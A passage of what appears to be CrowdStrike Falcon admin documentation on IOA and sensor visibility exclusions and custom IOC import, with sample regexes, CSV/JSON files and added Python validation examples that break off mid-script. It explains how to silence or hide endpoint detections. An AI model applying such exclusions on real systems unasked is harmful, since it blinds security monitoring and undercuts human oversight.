  3. Select the desired file export format. Choose between CSV or JSON file types.
  4. Download the exported files. Optionally, you can delete any exported files you no longer need.
Manage IOA exclusions

Add IOAs to your allowlist to reduce behavioral IOA detections and preventions. Most IOA exclusions are created from within CrowdStrike-generated IOA detections, or by duplicating and then modifying an existing IOA exclusion. Container drift exclusions are managed from Cloud Security. For more info, see Create exclusions to allow expected container drift.

View IOA exclusions

The IOA exclusions tab is where you can view, edit, duplicate, and delete IOA exclusions, and where you can view the IOA exclusion audit log and activity log.

By default, the list of exclusions is sorted by Last modified.

Create an IOA exclusion

There are two kinds of IOA exclusions:

  • Container drift exclusions, which are generated from Cloud security.
  • All other IOA exclusions, which are generated from Endpoint security.

To learn about creating container drift exclusions, see Create exclusions to allow expected container drift. For all other IOA exclusions, follow this procedure.

The Image filename and Command line primary exclusion pattern fields contain values from the originating detection.

  • If a suggested regex value would exceed the maximum 256 characters, the regex value is truncated to 256 characters and appended with .* to ensure that it matches any remaining characters. You can modify the suggested value, but the new value must not exceed 256 characters.

  • You can change the values displayed to accommodate your specific needs. For example, you might broaden the Image filename regular expression to encompass a wider set of file path variations. For more examples, see IOA exclusion regex examples.

  • The matching test string values are also prepopulated.

The Host Groups field is prepopulated with host data from the originating detection. You can modify the host group assignments to accommodate your specific needs.

  1. On Endpoint security > Monitor > Endpoint detections, for the CrowdStrike-generated IOA detection that you want to create an exclusion from, click to expand the detection’s summary.

  2. Click Create IOA exclusion.

  3. Search for the host groups that the exclusion will apply to, or select All host groups.

  4. Enter a name and a description for the exclusion. Descriptions are optional but are helpful if you’re managing a large number of exclusions.

  5. Configure exclusion patterns as needed for the primary, parent, and grandparent processes.
    1. For the primary process:

      1. Enter an exclusion pattern in regex format in the Image filename field. Depending on the exclusion, you can click Expand to see additional regex syntax suggestions.

      2. Optional. Test the image filename pattern against the original detection information.

      3. In the Command line field, enter a command line value in regex format.

      4. Optional. Test the command line pattern against the original detection information.

    2. For parent or grandparent processes:

      1. Select the ancestor exclusion patterns toggle to reveal these options. The toggle displays Include ancestor exclusion patterns when enabled.

      2. Configure parent and grandparent patterns using the same fields as the primary process.

  6. In the Image filename field, enter an exclusion pattern in regex format. Depending on the exclusion, you can click Expand to see additional regex syntax suggestions.

  7. Optional. Test the image filename pattern against the original detection information.

  8. In the Command line field, enter a command line value in regex format.

  9. Optional. Test the command line pattern against the original detection information.

  10. Recommended. Optionally, enter a comment for the audit log.

  11. Click Next.

  12. Carefully review the list of detections that wouldn’t have appeared and associated processes that would have been allowed to run if the exclusion were already in place.

  13. Click Create exclusion.

Duplicate an IOA exclusion

Create an IOA exclusion by duplicating an existing IOA exclusion and then modifying the new exclusion’s settings. This method enables you to create IOA exclusions without needing to start from within an IOA detection.

The IOA Name value uniquely identifies the IOA pattern and can’t be changed.

  1. Go to Endpoint security > Configure > Exclusions, and then go to the IOA exclusions tab.

  2. Click Open menu for the exclusion that you want to copy, and then click Duplicate.

    The fields in the new duplicated exclusion are prepopulated with values from the source exclusion.

  3. Modify settings as described in Create an IOA exclusion.

  4. Recommended. Optionally, enter a comment for the audit log.

  5. Click Next.

  6. Carefully review the list of detections that wouldn’t have appeared and associated processes that would have been allowed to run if the exclusion were already in place.

  7. Click Create exclusion.

Tip: Container drift exclusions can also be managed from Cloud security > Rules and Policies > Policies > Container drift exclusions.

Edit an IOA exclusion

The IOA name value uniquely identifies the IOA pattern and can’t be changed.

  1. Go to Endpoint security > Configure > Exclusions, and then go to the IOA exclusions tab.

  2. Click Open menu for the exclusion that you want to modify, and then click Edit.

  3. Modify settings as described in Create an IOA exclusion.

  4. Recommended. Optionally, enter a comment for the audit log.

  5. Click Next.

  6. Carefully review the list of detections that wouldn’t have appeared and associated processes that would have been allowed to run if the updated exclusion were already in place.

  7. Click Update.

Tip: Container drift exclusions can also be managed from Cloud security > Rules and Policies > Policies > Container drift exclusions.

Delete an IOA exclusion

Delete exclusions with caution. A deleted exclusion cannot be recovered.

  1. Go to Endpoint security > Configure > Exclusions, and then go to the IOA exclusions tab.

  2. In the Actions column for the exclusion that you want to delete, click Delete.

  3. Review the list of changes that would apply if the exclusion were deleted.

  4. Recommended. Optionally, enter a comment for the audit log.

  5. Click Delete exclusion.

Tip: Container drift exclusions can also be managed from Cloud security > Rules and Policies > Policies > Container drift exclusions.

Export IOA exclusions

Export a report for IOA exclusions.
  1. Go to Endpoint security > Configure > Exclusions, and then go to the IOA exclusions tab.

  2. Click Export.

  3. Select the desired file export format. Choose between CSV or JSON file types.
  4. Download the exported files. Optionally, you can delete any exported files you no longer need.
Tip: Container drift exclusions can also be managed from Cloud security > Rules and Policies > Policies > Container drift exclusions.

View the IOA exclusions activity log

View a list of events that would have triggered detections if the exclusions hadn’t been in place.

  1. Go to Endpoint security > Configure > Exclusions, and then go to the IOA exclusions tab.

  2. Click See activity.

  3. Sort columns to adjust your view of the log.

  4. Click any event to see additional details.

View the IOA exclusions audit log

View the history of changes to your IOA exclusions.

  1. Go to Endpoint security > Configure > Exclusions, and then go to the IOA exclusions tab.

  2. Click See audit log.

  3. Adjust your view by filtering or sorting the log entries.

  4. Click any revision to see additional details.

IOA exclusion regex examples

For info about supported regular expression syntax in Falcon, see Create an IOA exclusion and Supported regex syntax.

This example broadens an image filename’s regex:

Detection’s image filename value:
\Device\HarddiskVolume2\Program Files (x86)\Tools\myTools1\bin\tool_v1.1.exe

Prepopulated image filename regex:
.*\\Program Files \(x86\)\\Tools\\MyTools1\\bin\\tool_v1\.1\.exe

Modified regex that captures filenames that contain version numbers consisting of one or more digits (for example, tool_v1.1.exe or tool_v22.0001.exe):
.*\\Program Files \(x86\)\\Tools\\MyTools1\\bin\\tool_v\d+\.\d+\.exe

Modified regex that captures filenames containing any version number format (for example, tool_vABC123.xyz_123.exe):
.*\\Program Files \(x86\)\\Tools\\MyTools1\\bin\\tool_v.*\.exe

This example broadens a command line’s regex:

Detection’s command line value:
"C:\Program Files (x86)\Tools\MyTools1\bin\tool_v1.1.exe" -classpath C:\Users\demo\AppData\Local\Temp\~spawn2818010883315786762.tmp.dir tool.Payload

Prepopulated command line regex:
".*\\Program Files \(x86\)\\Tools\\MyTools\\bin\\tool_v1.1\.exe" -classpath .*\\Users\\demo\\AppData\\Local\\Temp\\~spawn2818010883315786762\.tmp\.dir tool\.Payload

Modified regex that covers any numerical variation in the number after “spawn”:
".*\\Program Files \(x86\)\\Tools\\MyTools\\bin\\tool_v1.1\.exe" -classpath .*\\Users\\demo\\AppData\\Local\\Temp\\~spawn\d+\.tmp\.dir tool\.Payload
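As an added example (not code from the CrowdStrike documentation), the following Python script applies the three image filename patterns above to a handful of constructed image filenames, to show how much each broadened regex would silence before it is saved. It assumes whole-string, case-insensitive matching, which the page does not state; case-insensitivity is also the only reading under which the page's own prepopulated regex (MyTools1) matches its detection value (myTools1).

```python
import re

# Limit stated on this page for an IOA exclusion regex value.
MAX_PATTERN_LEN = 256

# Values from the page's image filename example (Windows paths, literal backslashes).
DETECTED_IMAGE = r"\Device\HarddiskVolume2\Program Files (x86)\Tools\myTools1\bin\tool_v1.1.exe"
PREPOPULATED = r".*\\Program Files \(x86\)\\Tools\\MyTools1\\bin\\tool_v1\.1\.exe"
VERSION_DIGITS = r".*\\Program Files \(x86\)\\Tools\\MyTools1\\bin\\tool_v\d+\.\d+\.exe"
VERSION_ANY = r".*\\Program Files \(x86\)\\Tools\\MyTools1\\bin\\tool_v.*\.exe"

# Constructed image filenames to probe each pattern with (not from the page).
BIN = r"\Device\HarddiskVolume2\Program Files (x86)\Tools\MyTools1\bin"
SAMPLES = [
    DETECTED_IMAGE,                      # the original detection
    BIN + r"\tool_v22.0001.exe",         # newer build, digits-only version
    BIN + r"\tool_vABC123.xyz_123.exe",  # non-numeric version string
    BIN + r"\tool_v2\unrelated.exe",     # a different binary in a subfolder
    r"C:\Users\demo\Downloads\MyTools1\bin\tool_v1.1.exe",  # same tool copied elsewhere
]


def compile_exclusion(pattern):
    """Return (compiled regex, None), or (None, reason) if the pattern cannot be used.

    Assumption: matching is case-insensitive and applies to the whole image filename
    (the page's suggested patterns start with .* and end at the extension, which only
    makes sense for whole-string matching).
    """
    if len(pattern) > MAX_PATTERN_LEN:
        return None, f"pattern is {len(pattern)} characters; the limit is {MAX_PATTERN_LEN}"
    try:
        return re.compile(pattern, re.IGNORECASE), None
    except re.error as exc:
        return None, f"invalid regex: {exc}"


def exclusion_scope(pattern, image_filenames=SAMPLES):
    """Return the image filenames the exclusion would silence, in input order."""
    regex, reason = compile_exclusion(pattern)
    if regex is None:
        raise ValueError(reason)
    return [name for name in image_filenames if regex.fullmatch(name)]


if __name__ == "__main__":
    # Note how tool_v.*\.exe also silences tool_v2\unrelated.exe: an unanchored .*
    # happily crosses directory separators, so the exclusion is wider than the
    # "any version number format" wording suggests.
    for label, pattern in [("prepopulated", PREPOPULATED),
                           ("digits version", VERSION_DIGITS),
                           ("any version", VERSION_ANY)]:
        print(f"{label}: {exclusion_scope(pattern)}")
```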

Manage sensor visibility exclusions

Use extreme caution and consider the potential security risks before creating sensor visibility exclusions. For more info, see Sensor visibility exclusions.

View sensor visibility exclusions

The Sensor visibility exclusions tab is where you can view, create, edit, and delete your sensor visibility exclusions, and where you can view the sensor visibility exclusion audit logs.

By default, the list of exclusions is sorted by Last modified.

Create sensor visibility exclusions

Create an exclusion to stop sensor visibility, detections, and preventions for a trusted file path.

Note: Use extreme caution and consider the potential security risks before creating sensor visibility exclusions. Malware or other attacks will not be recorded, detected, or prevented. For more info, see Sensor visibility exclusions.
  1. Go to Endpoint security > Configure > Exclusions, and then go to the Sensor visibility exclusions tab.

  2. Click Create exclusion.
  3. In Create sensor visibility exclusion, select Groups of hosts and add the host groups that the exclusion will apply to, or select All hosts.

  4. In the Exclusion pattern field, enter an exclusion pattern in Glob Syntax.

  5. Optional. Under Pattern test, test the exclusion pattern:

    1. Type a file path, and then click Test pattern.

    2. Check the confirmation message to see whether your test pattern matches the syntax.

  6. Recommended. Optionally, enter a comment to include in the audit log.

  7. Optional. If you want to add another exclusion pattern after this one, select Create another exclusion with these hosts after saving.

  8. Click Create exclusion, and then click Confirm and create.

Edit sensor visibility exclusions

Modify an existing sensor visibility exclusion.

  1. Go to Endpoint security > Configure > Exclusions, and then go to the Sensor visibility exclusions tab.

  2. Click Open menu for the exclusion that you want to modify, and then click Edit.

  3. In Edit sensor visibility exclusion, select Groups of hosts and add the host groups that the exclusion will apply to, or select All hosts.

  4. In the Exclusion pattern field, enter an exclusion pattern in Glob Syntax.

  5. Optional. Under Pattern test, test the exclusion pattern:

    1. Type a file path, and then click Test pattern.

    2. Check the confirmation message to see whether your test pattern matches the syntax.

      Note: When editing a sensor visibility exclusion, if the original pattern includes a * then the pattern tester will be visible. If not, the pattern tester will not be present.
  6. Recommended. Optionally, enter a comment to include in the audit log.

  7. Optional. If you want to add another exclusion pattern after this one, select Create another exclusion with these hosts after saving.

  8. Click Save, and then click Confirm and create.

Delete sensor visibility exclusions

Delete exclusions with caution. A deleted exclusion cannot be recovered.

  1. Go to Endpoint security > Configure > Exclusions, and then go to the Sensor visibility exclusions tab.

  2. Click Open menu for the exclusion that you want to delete, and then click Delete.

  3. In Delete sensor visibility exclusion, review the list of changes that would apply if the exclusion were deleted.

  4. Recommended. Optionally, enter a comment to include in the audit log.

  5. Click Delete exclusion.

Export sensor visibility exclusions

Export a report for sensor visibility exclusions.
  1. Go to Endpoint security > Configure > Exclusions, and then go to the Sensor visibility exclusions tab.

  2. Click Export.

  3. Select the desired file export format. Choose between CSV or JSON file types.
  4. Download the exported files. Optionally, you can delete any exported files you no longer need.
View exclusions audit logs

View the history of changes to your exclusions.

  1. Go to Endpoint security > Configure > Exclusions.

  2. On the applicable exclusions tab, click See audit log.

  3. Sort the columns to adjust your view of the log. In the Action column, logged revisions are defined as Created exclusion, Updated exclusion, or Deleted exclusion.

  4. Click any revision for Audit log details.

Custom IOCs
Overview

Add your own custom indicators of compromise (IOCs) to gain visibility, while adding false positives to your allowlist and adding executables to your blocklist for a tailored environment.

Requirements

Subscriptions: Falcon Insight XDR or Falcon Prevent

Sensor support:

  • Falcon sensor for Windows, macOS, and Linux version 6.25 and later

  • Falcon sensor for Android version 2022.01.3110002 and later

  • Falcon sensor for iOS version 2022.01.1 and later

Roles:

  • These roles can add and manage custom IOCs:

    • Falcon Administrator

    • Detections Exceptions Manager

  • These roles can view custom IOCs and custom IOC audit logs:

    • Falcon Analyst

    • Falcon Analyst - Read Only

    • Falcon Security Lead

    • Falcon Investigator

Note: Falcon Container does not support custom IOCs for pods.
Understanding custom IOCs

Configure Falcon to observe custom IOCs in your environment and to specify what action the sensor takes when a matching IOC is observed on a host.

You can use custom IOCs to add false positive detections to your allowlist or to add applications to your blocklist to prevent their execution in your environment. It’s not necessary to upload lists of commodity malware or comprehensive lists of all known trusted files because Falcon already maintains comprehensive lists of those IOCs.

Falcon provides detection capabilities for several types of custom IOCs.

These IOCs are supported for Windows, Mac, and Linux:

  • Domain names

  • IPv4 addresses

  • IPv6 addresses

  • SHA-256 hashes

  • MD5 hashes

    Note: MD5 hashes are not recommended because they’re undergoing industry deprecation and can be vulnerable to hash collisions.

These IOCs are supported for iOS and Android:

  • Domain names

  • Subdomains

    Note: The subdomains IOC includes all subdomains of the specified domain. However, the domain itself is not included.
  • IPv4 addresses

  • IPv6 addresses

For more info about mobile IOCs, including considerations and IOC limits, see Managing custom IOCs for mobile devices.

Custom IOCs in multi-CID environments

When configuring custom IOCs, you have the option to apply IOCs to specific host groups or all hosts. If you use Falcon Flight Control and you apply an IOC to all hosts from the parent CID, the IOC is applied to all hosts across all CIDs in your environment.

Actions

For each indicator that you add, you specify an action that the sensor takes when it encounters that indicator on a host.

Supported actions vary by indicator type. Hash detections are supported in:

  • Windows: Portable Executable (PE) files or Microsoft Office macros
  • Mac: Mach Object (Mach-O) files
  • Linux: Executable and Linkable Format (ELF) files
For each action, the entries below give its description and whether it is supported for hashes, IP addresses, and domain names (for mobile devices, domain names include subdomains).

Action: Block
Description: Add the indicator to your blocklist and show it as a detection. The file is completely removed from disk and is placed in the quarantine folder.
Hashes: Yes
IP addresses: Yes (mobile devices only)
Domain names: Yes (mobile devices only)

Action: Block, hide detection
Description: Block and detect the indicator, but hide it from Endpoint security > Monitor > Endpoint detections or Endpoint security > Monitor > Mobile detections. Discover this activity by searching for the indicator value in Investigate.
Hashes: Yes
IP addresses: Yes (mobile devices only)
Domain names: Yes (mobile devices only)

Action: Detect only
Description: Show the indicator as a detection and take no other action.
Hashes: Yes
IP addresses: Yes
Domain names: Yes

Action: Allow
Description: Add the indicator to your allowlist and do not detect it.
Hashes: Yes
IP addresses: Yes (mobile devices only)
Domain names: Yes (mobile devices only)

Action: No Action
Description: Save the indicator for future use but take no action.
Hashes: Yes
IP addresses: Yes
Domain names: Yes

Note: For unsupervised iOS devices, there might be limitations with the types of custom IOCs that can be applied to network connections, depending on your deployment. For more info, see Considerations with mobile IOCs.

Allow action

Hash-based allowlisting applies only to detections based on machine learning and detect-on-write. For info about adding IOA-based detections to your allowlist, see Exclusions.

Block action

Note: Hash-based blocklists take precedence over machine learning (ML) exclusions.

You assign a Block action to a hash using IOC Management. However, you must also enable the Custom Blocking setting for the blocking to actually happen. To enable this setting, go to Prevention Policies, find your policy and edit it so that in the Execution Blocking category, Custom Blocking is enabled.

You can control Execution Blocking independently through each prevention policy. However, you can assign custom IOCs to specific host groups.
Note: The block action for Office macro hashes is only supported for Office files detected and quarantined on write.

Custom IOC retrodetections

When indicators are uploaded for detection or blocking, the Falcon platform automatically searches historical Threat Graph data to see if any matches are found. If a match is found, a new detection is generated and captures the same context that a real-time detection includes. A detection found in historical data includes an additional section to indicate that it’s a retrospective detection, as opposed to a standard real-time detection. The retrospective look-back for custom IOCs in Threat Graph is effective up to your purchased data retention period.


Retrospective detection details example

Custom IOC audit log

CrowdStrike automatically records all changes to your custom IOCs in the custom IOC audit log. We recommend that you include a comment for the audit log whenever you add, edit, or delete a custom IOC. In the audit log comment, include any info that would help other people in your organization understand what you changed and why. For example, when adding a custom IOC, describe the indicator and explain why you added it.

Custom IOC tags

Apply one or more custom tags to your IOCs to help make your IOCs more maintainable and filterable. For example, you might use tags to link indicators to specific tickets, filter groups, or external sources.

Custom IOC tags apply to only the IOCs that you add and manage. They don’t apply to other Falcon features or settings.

Setup

Some setup required. If you want Falcon to observe custom IOCs in your environment, you must first upload the indicators and specify what action the sensor will take if the indicators are observed on hosts.

If you assign a Block action to a hash, you must also enable the Custom Blocking setting in Prevention Policies. This setting blocks any processes matching hashes that you add to your custom IOCs with a Block action. Configure Custom Blocking in Prevention Policies, in the Execution Blocking category.

Your CID can have up to 90,000 each of SHA256 and MD5 hashes per operating system, and up to 1 million total IOCs. Note that the previous size limit still applies to sensor versions earlier than 6.25, so only the most recently modified 12,000 indicators take effect for those sensors. Similarly, any indicators assigned to specific host groups don’t apply to sensor versions earlier than 6.25. For sensor versions earlier than 6.25, assign indicators to “all hosts” instead of to specific host groups.

Safeguards

As a safeguard, certain critical Windows operating system files cannot be added to your blocklist. Because not all OS executables are automatically safeguarded, we advise caution before attempting to add them to your blocklist.

Blocking hashes that are benign and executed often in your environment (for example, Windows operating system executables such as explorer.exe) can cause system instability or potentially catastrophic failures. During the process of adding custom IOCs, Falcon might display a warning before you add a known benign hash. However, we can’t guarantee that warnings will be generated for all critical hashes or prevent any resulting system instability. Additionally, Falcon displays a warning if you add a hash that already exists.

For hashes that Falcon displays warnings about, you can view more info in the custom IOC error reports. Custom IOC error reports are temporary and are generated only when indicators are added or edited.

Manage custom IOCs

View custom IOCs

The IOC Management page is where you can view, add, edit, export, and delete custom IOCs, and where you can view the custom IOC audit log.

Add custom IOCs

IOCs require certain metadata, and can include additional optional metadata. The Falcon console provides 2 methods for adding IOCs and IOC metadata:

  • Manually specify IOC metadata values while adding IOCs. For more info, see Add custom IOCs without metadata.

  • Import a file that already contains IOCs and their metadata values. This can be useful for importing previously exported IOCs that contain metadata, or for associating metadata to IOCs offline. For more info, see Import custom IOCs with metadata.

Add custom IOCs without metadata

Use this method to add one or more indicators without metadata. For info about importing indicators with metadata, see Import custom IOCs with metadata.

Note: Alternatively, you can quickly add a custom IOC from a detection summary panel when endpoint monitoring.

You must add each type of indicator (hash, domain name, or IP address) separately. However, you can add multiple indicators of the same type in a single operation.

If you bulk-add a batch of indicators, your selected settings apply to all indicators in the batch. You can modify settings for a specific indicator later by editing just that individual indicator. For more info, see Edit custom IOCs.

The specific settings available vary by indicator type.

  1. Go to Endpoint security > Configure > IOC management, and then click Open menu icon.

  2. Click one of these options:

    • Add hashes

    • Add domains

    • Add IP addresses

  3. Enter a descriptive comment about the indicators.

  4. Configure indicator settings as described in Custom IOC configuration fields.

  5. (Recommended) Enter a comment to include in the audit log.

  6. Click Add.

  7. Optional. Review any errors that were reported.

    Note: IOC error reports are temporary and are generated only when indicators are added or edited.
  8. If you specified a Block action for hashes, ensure that Custom Blocking is enabled on the Prevention Policies page.

Import custom IOCs with metadata

Bulk-import custom IOCs with metadata, and specify the action to take when the sensor observes the indicators on hosts. For info about adding indicators without metadata, see Add custom IOCs without metadata.

You can import any combination of indicator types (hashes, domains, subdomains, or IP addresses) with metadata in a single CSV or JSON file. For file formatting guidelines, see Format guidelines to add custom IOCs.

  1. Go to Endpoint security > Configure > IOC management, click Open menu icon, and then select Import with metadata.

  2. Select the file that you want to upload.

  3. (Recommended) Enter a comment to include in the audit log.

  4. Click Import.

  5. Optional. Review any errors that were reported.

    Note: IOC error reports are temporary and are generated only when indicators are added or edited.
  6. If you specified a Block action for hashes, ensure that Custom Blocking is enabled on the Prevention Policies page.

Edit custom IOCs

If you bulk-edit a batch of indicators, your selected settings apply to all indicators in the batch.

Any changes that you make to an individual indicator are applied to only that indicator, and not to any other indicators that were originally added in the same batch.

The specific settings available vary by indicator type.

Note: Certain metadata values can’t be modified.
  1. Go to Endpoint security > Configure > IOC management.

  2. Filter the results as needed, select the checkboxes for the indicators that you want to edit, and then click Edit selected indicators.

  3. Modify settings as described in Custom IOC configuration fields.

  4. If you’re editing multiple types of indicators, click Next to modify the settings for each additional indicator type.

  5. (Recommended) Enter a comment to include in the audit log.

  6. Click Update indicators.

  7. Optional. Review any errors that were reported.

    Note: IOC error reports are temporary and are generated only when indicators are added or edited.
  8. If you specified a Block action for hashes, ensure that Custom Blocking is enabled on the Prevention Policies page.

Delete custom IOCs

Delete one or more indicators. After you delete a custom IOC, the Falcon console no longer displays future detections for that indicator in Endpoint security > Monitor > Endpoint detections.

  1. Go to Endpoint security > Configure > IOC management.

  2. Select the checkboxes for the indicators that you want to delete, and then click Delete selected indicators.

  3. (Recommended) Enter a comment to include in the audit log.

  4. Click Delete indicators.

Export custom IOCs

Export a list of indicators in CSV or JSON format.

  1. Go to Endpoint security > Configure > IOC management. A full list of your custom IOCs appears.

  2. Refine the list of results as needed. For more info, see Viewing custom IOCs.

  3. Click Export icon, and then click either CSV or JSON. Falcon prepares the file for download.

    Note: The file preparation process can take up to 15 minutes to complete.
  4. Click Download.

View custom IOCs

View all of your indicators, or refine the results through sorting, filtering, searching by keyword, or specifying which columns are visible. For info about exporting your filtered results, see Export custom IOCs.

The Last seen value indicates when the IOC was last detected executing in your environment and is effective up to your purchased data retention period. If the Last seen value is blank, the date is either beyond your purchased data retention period or an IOC hasn't been detected during the current retention period.

For IOCs that CrowdStrike migrated on behalf of customers before the deployment of the new IOC Management feature, the username shown is [email protected].

  1. Go to Endpoint security > Configure > IOC management. A full list of your custom IOCs appears.

  2. Refine the list of results as needed:

    • Apply filters:

      1. Click a filter at the top of the list, or click More filters to see additional filtering options.

      2. Select or clear the filter-specific metadata options, and then click Apply.

    • Search by keyword:

      1. Click Search indicators.

      2. Type a keyword, and then click Apply.

    • Specify which columns are visible:

      1. Click Configure table columns icon.

      2. Select the checkboxes for the columns that you want to see.

  3. Click any indicator to see additional details.

View the custom IOC audit log

View the history of changes to your custom IOCs. The audit log lists changes made through both the Falcon console and the CrowdStrike API.

  1. Go to Endpoint security > Configure > IOC management, click Open menu icon, and then select See audit log.

  2. Adjust your view by filtering or sorting the log entries.

  3. Click any revision to see additional details.

Format guidelines to add custom IOCs

Format guidelines for indicators:

SHA-256 hash:

  • 64 hex characters, any case

  • Examples:

    0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef

    1123456789ABCDEF0123456789ABCDEF1123456789ABCDEF0123456789ABCDEF

    2123456789abcdef0123456789ABCDEF2123456789abcdef0123456789ABCDEF

MD5 hash:

  • 32 hex characters, any case

  • Examples:

    0123456789abcdef0123456789abcdef

    1123456789ABCDEF0123456789ABCDEF

    2123456789abcdef0123456789ABCDEF

IPv4 address:

  • A valid dotted quad using base 10 numerals

  • A single address and not a CIDR range

  • Leading zeros are acceptable

  • Examples:

    1.1.1.1

    255.255.255.255

    042.042.000.001

IPv6 address:

  • A valid IPv6 address in hex-colon format, any case

  • A single address and not a range

  • Examples:

    2001:0db8:0001:0000:0000:0ab9:C0A8:0102

    2001:db8:1::ab9:C0A8:102

    2001:db8::

    ::1234:5678

    2001:db8:3333:4444:5555:6666:1.2.3.4

    ::1234:5678:91.123.4.56

Domain and subdomain names:

  • A valid ASCII domain name, fully qualified or not, with a top level domain.

  • Can contain the letters a-z, numbers 0-9, and the hyphen (not at the beginning), plus dots. Wildcard characters are not supported.

  • A domain or subdomain name can contain no more than 200 characters, including dots.

  • Examples:

    www.example.com

    non-profit.org

    tech.net

    badguys.mil

Format guidelines to add IOCs without metadata in a CSV file:

  • The file must have the .csv file extension.

  • The file must contain a newline-separated list of indicator values.

  • The file must contain exactly one column.

  • The file must not include a header row.

  • Each row in the file represents one indicator.

Format guidelines to add IOCs without metadata in a JSON file:

  • The file must have the .json file extension and be a simple array of indicator values as strings:

    [
    "hash1",
    "hash2",
    "hash3"
    ]

Format guidelines to import IOCs with metadata in a CSV file:

  • The file must have the .csv file extension.

  • The file must be in a plain text encoding (such as ASCII or UTF-8).

  • The file must include a header.

  • Each row in the file represents one indicator.

  • Some spreadsheet applications enclose comma-containing cells in quotation marks by default. For values that must be enclosed in quotation marks, ensure that only one set of quotation marks is used.

  • The file can contain up to 10 columns, in any order:

    Column name Description

    value

    Required. The canonical value as a string.

    type

    Required. The IOC type. Supported values:

    • sha256
    • md5
    • domain
    • all_subdomains (mobile devices only)
    • ipv4
    • ipv6

    description

    Optional. A descriptive comment about the IOC.

    platforms

    Required. A list of platforms, separated by commas. Enclose in double quotation marks if commas are used (standard CSV format). Supported values:

    • windows
    • mac
    • linux
    • android
    • ios

    Example: "windows,mac"

    host_groups

    Optional. A list of host groups, identified by host group ID and separated by commas. Enclose in double quotation marks if commas are used (standard CSV format).

    applied_globally

    Required if host_groups is not provided. Boolean. If the indicator should be applied to all hosts, provide the true value. If any host_groups are provided, provide the false value.

    action

    Required. The action to take if the IOC is observed on a Windows, Mac, or Linux host. Supported values:

    • prevent (displayed as Block in the console)
    • prevent_no_ui (displayed as Block, hide detection in the console)
    • detect (displayed as Detect only in the console)
    • allow (displayed as Allow in the console)
    • no_action (displayed as None in the console)

    mobile_action

    Required. The action to take if the IOC is observed on an Android or iOS host. Supported values:

    • prevent (displayed as Block in the console)
    • prevent_no_ui (displayed as Block, hide detection in the console)
    • detect (displayed as Detect only in the console)
    • allow (displayed as Allow in the console)
    • no_action (displayed as None in the console)

    severity

    Required if action is set to prevent or detect. The indicator’s custom severity level. Supported values:

    • critical
    • high
    • medium
    • low
    • informational

    expiration

    Optional. The indicator’s Action value changes to None after the specified expiration date. The time zone of the date is UTC.

    Example: 2021-06-30

    tags

    Optional. Custom tags, separated by commas. Enclose in double quotation marks if commas are used (standard CSV format).

    Example: "tag1,tag2"

    metadata.filename

    Optional. A filename, for example, from your environment or from intel reporting.

    Example: software.exe

Sample CSV file:

type,value,description,platforms,host_groups,applied_globally,severity,action,expiration,metadata.filename
domain,wicar.org,"A domain to detect for testing","windows,linux",,true,medium,no_action,2022-03-17,
sha256,1234567890123456789012345678901234567890123456789012345678901234,"A hash to block for testing",windows,,true,high,prevent,,test.exe
domain,test.org,"Another domain to detect for testing","windows,linux,mac","11115678901234567890123456781111,22225678901234567890123456782222",false,high,detect,2022-03-17,
sha256,2222567890123456789012345678901234567890123456789012345678902222,"Another hash to block for testing",windows,"11115678901234567890123456781111,22225678901234567890123456782222",false,,prevent_no_ui,,test2.exe
ipv4,192.168.0.0,"An IPv4 to detect for testing","windows",22225678901234567890123456782222,false,critical,detect,2022-03-17,
md5,aaaa567890123456789012345678aaaa,"A hash to block for testing",windows,"33335678901234567890123456783333,cccc567890123456789012345678cccc,dddd567890123456789012345678dddd",false,informational,prevent,,test3.exe

Format guidelines to import IOCs with metadata in a JSON file: the file is a JSON array of indicator objects that use the same field names as the CSV columns. List-valued fields (platforms, host_groups, tags) are JSON arrays, applied_globally is a boolean, and the metadata.filename column becomes a nested metadata object with a filename key.

Sample JSON file:

[
  {
    "action": "detect",
    "description": "test domain",
    "expiration": "2037-03-21",
    "host_groups": [
      "be024f23162645a6a8d65a837e308ae6",
      "2801ae3e4479409992f94b3186fb7680"
    ],
    "platforms": [
      "windows",
      "mac"
    ],
    "severity": "high",
    "tags": [
      "one",
      "two"
    ],
    "type": "domain",
    "value": "www.google.com"
  },
  {
    "action": "prevent_no_ui",
    "description": "test SHA256",
    "expiration": "2037-03-21",
    "host_groups": [
      "be024f23162645a6a8d65a837e308ae6",
      "2801ae3e4479409992f94b3186fb7680"
    ],
    "metadata": {
      "filename": "iexplore.exe"
    },
    "platforms": [
      "windows",
      "mac"
    ],
    "severity": "",
    "tags": [
      "one",
      "two"
    ],
    "type": "sha256",
    "value": "688787d8ff144c502c7f5cffaafe2cc588d86079f9de88304c26b0cb99ce91c6"
  },
  {
    "action": "allow",
    "description": "test allow SHA256",
    "applied_globally": true,
    "host_groups": [],
    "metadata": {
      "filename": "explorer.exe"
    },
    "platforms": [
      "windows"
    ],
    "tags": [
      "three",
      "two"
    ],
    "type": "sha256",
    "value": "688787d8ff144c502c7f5cffaafe2cc588d86079f9de88304c26b0cb99ce91c6"
  },
  {
    "action": "prevent",
    "description": "test MD5",
    "expiration": "2037-03-21",
    "host_groups": [
      "be024f23162645a6a8d65a837e308ae6",
      "2801ae3e4479409992f94b3186fb7680"
    ],
    "metadata": {
      "filename": "powershell.exe"
    },
    "platforms": [
      "windows",
      "mac"
    ],
    "severity": "critical",
    "tags": [
      "one",
      "two"
    ],
    "type": "md5",
    "value": "7815696ecbf1c96e6894b779456d330e"
  },
  {
    "action": "detect",
    "description": "test IPV6",
    "expiration": "2037-03-21",
    "host_groups": [
      "be024f23162645a6a8d65a837e308ae6",
      "2801ae3e4479409992f94b3186fb7680"
    ],
    "platforms": [
      "windows",
      "mac"
    ],
    "severity": "medium",
    "tags": [
      "one",
      "two"
    ],
    "type": "ipv6",
    "value": "0:0:0:0:0:ffff:fbb9:cd30"
  },
  {
    "action": "detect",
    "description": "test IPV4",
    "expiration": "2037-03-21",
    "host_groups": [
      "be024f23162645a6a8d65a837e308ae6",
      "2801ae3e4479409992f94b3186fb7680"
    ],
    "platforms": [
      "windows",
      "mac"
    ],
    "severity": "high",
    "tags": [
      "one",
      "two"
    ],
    "type": "ipv4",
    "value": "251.185.205.48"
  }
]
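
The two file layouts above share one set of column rules (required fields, the host_groups/applied_globally pairing, severity only for prevent and detect, UTC expiration dates). The following script is an added example, not CrowdStrike code: it normalises CSV rows into the same dict shape the JSON file uses and runs one validator over either format before upload, and it also shows the quoting pitfall mentioned in the CSV guidelines. The sample rows, including the host group IDs, are constructed for this example; the first two rows copy the shape of the documented sample, the last three each break a documented rule.

```python
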